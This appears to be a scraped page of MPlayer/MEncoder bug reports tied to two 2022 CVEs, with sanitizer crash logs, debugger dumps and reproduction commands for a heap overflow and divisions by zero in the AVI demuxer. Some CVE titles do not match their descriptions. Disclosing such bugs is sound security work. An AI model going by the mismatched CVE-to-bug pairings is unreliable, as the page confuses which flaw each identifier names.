MEncoder SVN-r38374-13.0.1 (C) 2000-2022 MPlayer Team
success: format: 0  data: 0x0 - 0x2aa3
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
=================================================================
==6848==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004370 at pc 0x55e9886b95dc bp 0x7fffc79a7df0 sp 0x7fffc79a7de8
READ of size 4 at 0x602000004370 thread T0
    #0 0x55e9886b95db in read\_avi\_header /home/jlx/good\_mplayer/mplayer/libmpdemux/aviheader.c:364:12
    #1 0x55e9886ecd1e in demux\_open\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:464:3
    #2 0x55e9886ecd1e in demux\_open\_hack\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:885:14
    #3 0x55e9886c5f97 in demux\_open /home/jlx/good\_mplayer/mplayer/libmpdemux/demuxer.c:1294:10
    #4 0x55e9884711f3 in main /home/jlx/good\_mplayer/mplayer/mencoder.c:707:11
    #5 0x7f4b98de10b2 in \_\_libc\_start\_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

0x602000004370 is located 31 bytes to the right of 1-byte region \[0x602000004350,0x602000004351)
allocated by thread T0 here:
    #0 0x55e98843e43d in malloc (/home/jlx/good\_mplayer/asan\_mplayer/mencoder+0x1a643d)
    #1 0x55e9886ae994 in read\_avi\_header /home/jlx/good\_mplayer/mplayer/libmpdemux/aviheader.c:358:26
    #2 0x55e9886ecd1e in demux\_open\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:464:3
    #3 0x55e9886ecd1e in demux\_open\_hack\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:885:14
    #4 0x55e9886c5f97 in demux\_open /home/jlx/good\_mplayer/mplayer/libmpdemux/demuxer.c:1294:10
    #5 0x55e9884711f3 in main /home/jlx/good\_mplayer/mplayer/mencoder.c:707:11
    #6 0x7f4b98de10b2 in \_\_libc\_start\_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jlx/good\_mplayer/mplayer/libmpdemux/aviheader.c:364:12 in read\_avi\_header
Shadow bytes around the buggy address:
  0x0c047fff8810: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8820: fa fa 06 fa fa fa 06 fa fa fa 04 fa fa fa 04 fa
  0x0c047fff8830: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8840: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c047fff8850: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
=>0x0c047fff8860: fa fa 00 00 fa fa fd fd fa fa 01 fa fa fa\[fa\]fa
  0x0c047fff8870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff88a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff88b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==6848==ABORTING

CVE-2022-38866: #2403 (A heap-buffer-overflow occurred in function read_avi_header() of libmpdemux/aviheader.c) – MPlayer

Certain The MPlayer Project products are vulnerable to Divide By Zero via the function demux_avi_read_packet of libmpdemux/demux_avi.c. This affects mplyer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.

**#2401 closed defect (fixed)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

undetermined

Version:

HEAD

Severity:

major

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Version: SVN-r38374-13.0.1  

Build command: ../configure --disable-ffmpeg\_a && make (compiling with asan)  

Summary of the bug: An division by zero is found in fucnction play() which affects mencoder and mplayer The attached file can reproduce this issue (ASAN-recompilation is needed).  

How to reproduce:  

1.Command: ./mencoder -ovc lavc -oac lavc -o /dev/null ./testcase  

> ./mplayer ./testcase  

2.Result:  

MEncoder SVN-r38374-13.0.1 (C) 2000-2022 MPlayer Team
success: format: 0  data: 0x0 - 0x2aa8
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
\[aviheader\] Audio stream found, -aid 1
AddressSanitizer:DEADLYSIGNAL
=================================================================
==32677==ERROR: AddressSanitizer: FPE on unknown address 0x563dfce77dc4 (pc 0x563dfce77dc4 bp 0x60c000000040 sp 0x7ffda83c4650 T0)
    #0 0x563dfce77dc4 in demux\_avi\_read\_packet /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:161:32

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:161:32 in demux\_avi\_read\_packet
==32677==ABORTING

MPlayer SVN-r38374-9 (C) 2000-2022 MPlayer Team

Playing /home/jlx/crashes/id^%000048,sig^%08,src^%000002,time^%8657653,execs^%414593,op^%havoc,rep^%2.
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
\[aviheader\] Audio stream found, -aid 1


MPlayer interrupted by signal 8 in module: demux\_open
- MPlayer crashed by bad usage of CPU/FPU/RAM.
  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and
  disassembly. Details in DOCS/HTML/en/bugreports\_what.html#bugreports\_crash.
- MPlayer crashed. This shouldn't happen.
  It can be a bug in the MPlayer code \_or\_ in your drivers \_or\_ in your
  gcc version. If you think it's MPlayer's fault, please read
  DOCS/HTML/en/bugreports.html and follow the instructions there. We can't and
  won't help unless you provide this information when reporting a possible bug.

Program received signal SIGFPE, Arithmetic exception.
0x00005637aa590311 in demux\_avi\_read\_packet (demux=0x5637ac1247a0, ds=0x5637ac126050, id=1651978544, len=21, idxpos=<optimized out>, flags=<optimized out>) at libmpdemux/demux\_avi.c:158
158           priv->avi\_audio\_pts=0;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────\[ REGISTERS \]────────────────────────────────────────────────────────────
 RAX  0x14
 RBX  0x16
 RCX  0x0
 RDX  0x0
 RDI  0x5637ac1247a0 —▸ 0x5637aa7a3c20 (demuxer\_desc\_avi) —▸ 0x5637aa754dbc ◂— 'AVI demuxer'
 RSI  0x0
 R8   0x1
 R9   0x1
 R10  0x0
 R11  0x5637aa592800 (demux\_open\_hack\_avi+240) ◂— mov    eax, dword ptr \[rbx + 8\]
 R12  0x5637ac1260f0 —▸ 0x5637ac122480 ◂— 0x1062773130
 R13  0x5637ac1247a0 —▸ 0x5637aa7a3c20 (demuxer\_desc\_avi) —▸ 0x5637aa754dbc ◂— 'AVI demuxer'
 R14  0x62773130
 R15  0x15
 RBP  0x5637ac126050 ◂— 0x0
 RSP  0x7ffc013e54a0 —▸ 0x5637ac126050 ◂— 0x0
 RIP  0x5637aa590311 (demux\_avi\_read\_packet+657) ◂— div    ecx
─────────────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────────────
 ► 0x5637aa590311 <demux\_avi\_read\_packet+657>    div    ecx
    ↓
   0x5637aa590311 <demux\_avi\_read\_packet+657>    div    ecx








──────────────────────────────────────────────────────────\[ SOURCE (CODE) \]──────────────────────────────────────────────────────────
In file: /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c
   153    pts = priv->audio\_block\_no \*
   154      (float)((sh\_audio\_t\*)demux->audio->sh)->audio.dwScale /
   155      (float)((sh\_audio\_t\*)demux->audio->sh)->audio.dwRate;
   156       } else
   157           pts=priv->avi\_audio\_pts; //+priv->pts\_correction;
 ► 158       priv->avi\_audio\_pts=0;
   159       // update blockcount:
   160       priv->audio\_block\_no+=
   161  (len+priv->audio\_block\_size-1)/priv->audio\_block\_size;
   162   } else
   163   if(ds==demux->video){
──────────────────────────────────────────────────────────────\[ STACK \]──────────────────────────────────────────────────────────────
00:0000│ rsp  0x7ffc013e54a0 —▸ 0x5637ac126050 ◂— 0x0
01:0008│      0x7ffc013e54a8 ◂— 0xffffffffffffffff
02:0010│      0x7ffc013e54b0 ◂— 0x1
03:0018│      0x7ffc013e54b8 —▸ 0x5637ac122480 ◂— 0x1062773130
04:0020│      0x7ffc013e54c0 —▸ 0x5637ac1247a0 —▸ 0x5637aa7a3c20 (demuxer\_desc\_avi) —▸ 0x5637aa754dbc ◂— 'AVI demuxer'
05:0028│      0x7ffc013e54c8 ◂— 0x15
06:0030│      0x7ffc013e54d0 —▸ 0x5637ac1260f0 —▸ 0x5637ac122480 ◂— 0x1062773130
07:0038│      0x7ffc013e54d8 ◂— 0xffff00000000
────────────────────────────────────────────────────────────\[ BACKTRACE \]────────────────────────────────────────────────────────────
 ► f 0     5637aa590311 demux\_avi\_read\_packet+657
   f 1     5637aa591962 demux\_avi\_fill\_buffer+1250
   f 2     5637aa584955 ds\_fill\_buffer+341
   f 3     5637aa584955 ds\_fill\_buffer+341
   f 4     5637aa592b1e demux\_open\_hack\_avi+1038
   f 5     5637aa592b1e demux\_open\_hack\_avi+1038
   f 6     5637aa592b1e demux\_open\_hack\_avi+1038
   f 7     5637aa5858f3 demux\_open\_stream+931
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

CVE-2022-38865: #2401 (A Division by zero occurred in function demux_avi_read_packet of libmpdemux/demux_avi.c) – MPlayer

Certain The MPlayer Project products are vulnerable to Divide By Zero via function demux_open_avi() of libmpdemux/demux_avi.c which affects mencoder. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.

**#2402 closed defect (duplicate)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

undetermined

Version:

HEAD

Severity:

major

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Version: SVN-r38374-13.0.1  

Build command: ../configure --disable-ffmpeg\_a && make (compiling with asan)  

Summary of the bug: An division by zero is found in fucnction demux\_open\_avi () which affects mencoder and mplayer. The attached file can reproduce this issue (ASAN-recompilation is needed).  

How to reproduce:  

1.Command: ./mencoder -ovc lavc -oac lavc -o /dev/null ./testcase  

> ./mplayer ./testcase  

2.Result:  

MPlayer SVN-r38374-9 (C) 2000-2022 MPlayer Team

Playing /home/jlx/crashes/id^%000056,sig^%08,src^%001688,time^%14273883,execs^%697532,op^%havoc,rep^%2.
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
\[aviheader\] Audio stream found, -aid 1
AVI: No audio stream found -> no sound.


MPlayer interrupted by signal 8 in module: demux\_open
- MPlayer crashed by bad usage of CPU/FPU/RAM.
  Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and
  disassembly. Details in DOCS/HTML/en/bugreports\_what.html#bugreports\_crash.
- MPlayer crashed. This shouldn't happen.
  It can be a bug in the MPlayer code \_or\_ in your drivers \_or\_ in your
  gcc version. If you think it's MPlayer's fault, please read
  DOCS/HTML/en/bugreports.html and follow the instructions there. We can't and
  won't help unless you provide this information when reporting a possible bug.

MEncoder SVN-r38374-13.0.1 (C) 2000-2022 MPlayer Team
success: format: 0  data: 0x0 - 0x2ab4
libavformat version 58.29.100 (external)
AVI file format detected.
\[aviheader\] Video stream found, -vid 0
\[aviheader\] Audio stream found, -aid 1
AVI: No audio stream found -> no sound.
AddressSanitizer:DEADLYSIGNAL
=================================================================
==19160==ERROR: AddressSanitizer: FPE on unknown address 0x55eacc77d2e7 (pc 0x55eacc77d2e7 bp 0x000000000004 sp 0x7ffce604b120 T0)
    #0 0x55eacc77d2e7 in demux\_open\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:571:42
    #1 0x55eacc77d2e7 in demux\_open\_hack\_avi /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:885:14

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c:571:42 in demux\_open\_avi
==19160==ABORTING

Breakpoint 3, demux\_open\_avi (demuxer=<optimized out>) at libmpdemux/demux\_avi.c:571
571             asamples+=(len+priv->audio\_block\_size-1)/priv->audio\_block\_size;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────\[ REGISTERS \]────────────────────────────────────────────────────────────────────────
 RAX  0x4
 RBX  0x55904d5f8d00 —▸ 0x55904d5f9410 ◂— 0xe1e1e1e1e1e1
 RCX  0x2fb
 RDX  0x4
 RDI  0x0
 RSI  0x55904d5f9440 ◂— 0x1062773130
 R8   0x1
 R9   0x0
 R10  0x55904d5f9470 ◂— 0x0
 R11  0x0
 R12  0x55904d5f73b0 —▸ 0x55904bcf5ec0 (demuxer\_desc\_avi) —▸ 0x55904bccffcc ◂— 'AVI demuxer'
 R13  0x55904d5f8c60 ◂— 0x0
 R14  0x55904d5f8d80 —▸ 0x55904d593400 ◂— 0x2fb00000000
 R15  0x0
 RBP  0x4
 RSP  0x7fff5a391720 —▸ 0x55904d593400 ◂— 0x2fb00000000
 RIP  0x55904bb55aa7 (demux\_open\_hack\_avi+1351) ◂— lea    eax, \[rax + r9 - 1\]
─────────────────────────────────────────────────────────────────────────\[ DISASM \]─────────────────────────────────────────────────────────────────────────
 ► 0x55904bb55aa7 <demux\_open\_hack\_avi+1351>    lea    eax, \[rax + r9 - 1\]
   0x55904bb55aac <demux\_open\_hack\_avi+1356>    xor    edx, edx
   0x55904bb55aae <demux\_open\_hack\_avi+1358>    div    r9d
    ↓
   0x55904bb55aae <demux\_open\_hack\_avi+1358>    div    r9d






─────────────────────────────────────────────────────────────────────\[ SOURCE (CODE) \]──────────────────────────────────────────────────────────────────────
In file: /home/jlx/good\_mplayer/mplayer/libmpdemux/demux\_avi.c
   566         vsize+=len;
   567         ++vsamples;
   568       }
   569       else if(d\_audio->id == id) {
   570         asize+=len;
 ► 571  asamples+=(len+priv->audio\_block\_size-1)/priv->audio\_block\_size;
   572       }
   573     }
   574     mp\_msg(MSGT\_DEMUX, MSGL\_V,
   575            "AVI video size=%"PRId64" (%zu) audio size=%"PRId64" (%zu)\\n",
   576            vsize, vsamples, asize, asamples);
─────────────────────────────────────────────────────────────────────────\[ STACK \]──────────────────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fff5a391720 —▸ 0x55904d593400 ◂— 0x2fb00000000
01:0008│      0x7fff5a391728 —▸ 0x55904d5f9430 ◂— 0x1062773130
02:0010│      0x7fff5a391730 —▸ 0x55904d5f8c60 ◂— 0x0
03:0018│      0x7fff5a391738 ◂— 0xffffffff
04:0020│      0x7fff5a391740 ◂— 0x62773130ffffffff
05:0028│      0x7fff5a391748 ◂— 0x588a634aec56d900
06:0030│      0x7fff5a391750 ◂— 0xffffffff
07:0038│      0x7fff5a391758 —▸ 0x55904bcf5ec0 (demuxer\_desc\_avi) —▸ 0x55904bccffcc ◂— 'AVI demuxer'
───────────────────────────────────────────────────────────────────────\[ BACKTRACE \]────────────────────────────────────────────────────────────────────────
 ► f 0     55904bb55aa7 demux\_open\_hack\_avi+1351
   f 1     55904bb55aa7 demux\_open\_hack\_avi+1351
   f 2     55904bb48743 demux\_open\_stream+931
   f 3     55904bb49231 demux\_open+753
   f 4     55904bac0642 main+1042
   f 5     7f7b8118c0b3 \_\_libc\_start\_main+243
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Tag

#c++